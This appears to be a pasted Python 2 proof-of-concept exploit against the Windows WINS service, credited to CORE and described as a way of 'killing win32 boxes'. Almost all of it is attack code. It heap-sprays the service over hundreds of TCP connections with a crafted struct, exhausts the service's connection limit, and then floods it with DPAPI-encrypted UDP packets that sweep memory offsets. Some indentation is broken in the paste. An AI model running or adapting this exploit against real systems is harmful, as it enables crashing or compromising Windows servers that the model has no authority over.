# very cool poc by CORE for killing win32 boxes,this could work on many ways :P

1. # very cool poc by CORE for killing win32 boxes,this could work on many ways :P very nice!
2. import sys
3. import socket
4. import struct
5. import time
6. import os
7.  
8. from ctypes import *
9. from ctypes.wintypes import DWORD
10.  
11. LocalFree = windll.kernel32.LocalFree
12. CryptProtectData = windll.crypt32.CryptProtectData
13. CryptUnprotectData = windll.crypt32.CryptUnprotectData
14. memcpy = cdll.msvcrt.memcpy
15.  
16. CRYPTPROTECT_LOCAL_MACHINE = 0x04
17.  
18. class DATA_BLOB(Structure):
19.      _fields_ = [("cbData", DWORD), ("pbData", POINTER(c_char))]
20.  
21. def get_data(blob):
22.      cbData = int(blob.cbData)
23.      pbData = blob.pbData
24.      buffer = c_buffer(cbData)
25.      memcpy(buffer, pbData, cbData)
26.      LocalFree(pbData);
27.      return buffer.raw
28.  
29. def Win32CryptProtectData(plain):
30.      buffer = c_buffer(plain, len(plain))
31.      iblob = DATA_BLOB(len(plain), buffer)
32.      oblob = DATA_BLOB()
33.      if CryptProtectData(byref(iblob), u"win32crypto.py", None, None,None, CRYPTPROTECT_LOCAL_MACHINE, byref(oblob)):
34.      return get_data(oblob)
35.      else:
36.      return None
37.  
38. def send_packet (sock, ip, port, message):
39.     packet = ""
40.     packet += message
41.     sock.sendto(packet, (ip, port))
42.  
43. # Check args
44. if len(sys.argv) != 4:
45.     print "\nUsage: python wins_poc.py <wins_tcp_dynamic_port(42)> <wins_udp_dynamic_port(41)> <writeable_address(hex)Try: 0x10c00>"
46.     print "\nNote: On Win2K3, the UDP dynamic port is the same number of the TCP port less one (42-1)"
47.     sys.exit(0)
48.  
49. # Get ports dinamically
50. tcp_dynamic_port = int(sys.argv[1])
51. udp_dynamic_port = int(sys.argv[2])
52. writeable_address = int(sys.argv[3], 16)
53.  
54. # Target IP
55. target_ip = "127.0.0.1"
56.  
57. # Create connections to do a heap spray
58. rpc_connections = []
59. for i in range(0, 1000):
60.     try:
61.     p = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
62.     p.connect((target_ip, tcp_dynamic_port))
63.     rpc_connections += [p]
64.     except Exception, e:
65.     break
66.  
67. # Struct that is validated by WINS
68. magic_struct  = ""
69. magic_struct += "a" * 0x0c
70. magic_struct += struct.pack("I", writeable_address-0x14)
71. magic_struct += struct.pack("I", 0)
72. magic_struct += struct.pack("I", 4)
73. magic_struct += "b" * (0x20-len(magic_struct))
74. magic_struct += struct.pack("I", 1)
75. magic_struct += "c" * (0x2c-len(magic_struct))
76. magic_struct += struct.pack("I", 0x10c00)
77. magic_struct += "d" * (0x38-len(magic_struct))
78. magic_struct += struct.pack("I", 0)
79. data  = ""
80. data += magic_struct
81. data += "B" * (0x4000-len(data))
82. data += "filling"
83.  
84. # Create connections to do a heap spray
85. for p in rpc_connections:
86.     try:
87.     p.send(data)
88.     except Exception, e:
89.     pass
90.  
91. # Get to the limit od WINS connections
92. print "[!] Connecting .."
93. ps = []
94. for i in range(0, 300):
95.     p = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
96.     p.connect((target_ip, 42))
97.     ps += [p]
98.  
99. # Go through an area 32Kb
100. for offset in range(0, 0x8000, 4):
101.     # Data to send
102.     data  = ""
103.     data += struct.pack("I", 0)
104.     data += "A" * 0x0c
105.     data += struct.pack("I", 0)
106.     data += struct.pack("I", 0x05000000+offset)
107.     # Encrypt
108.     data2 = Win32CryptProtectData(data)
109.     # Send the poisoned packet
110.     p = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
111.     send_packet(p, target_ip, udp_dynamic_port, data2)
112.     p.close ()
113.  
114. # Close all sockects
115. print "[*] Now Closing TCP connections ..."
116. for p in ps:
117.     p.close()
118. for p in rpc_connections:
119.     p.close()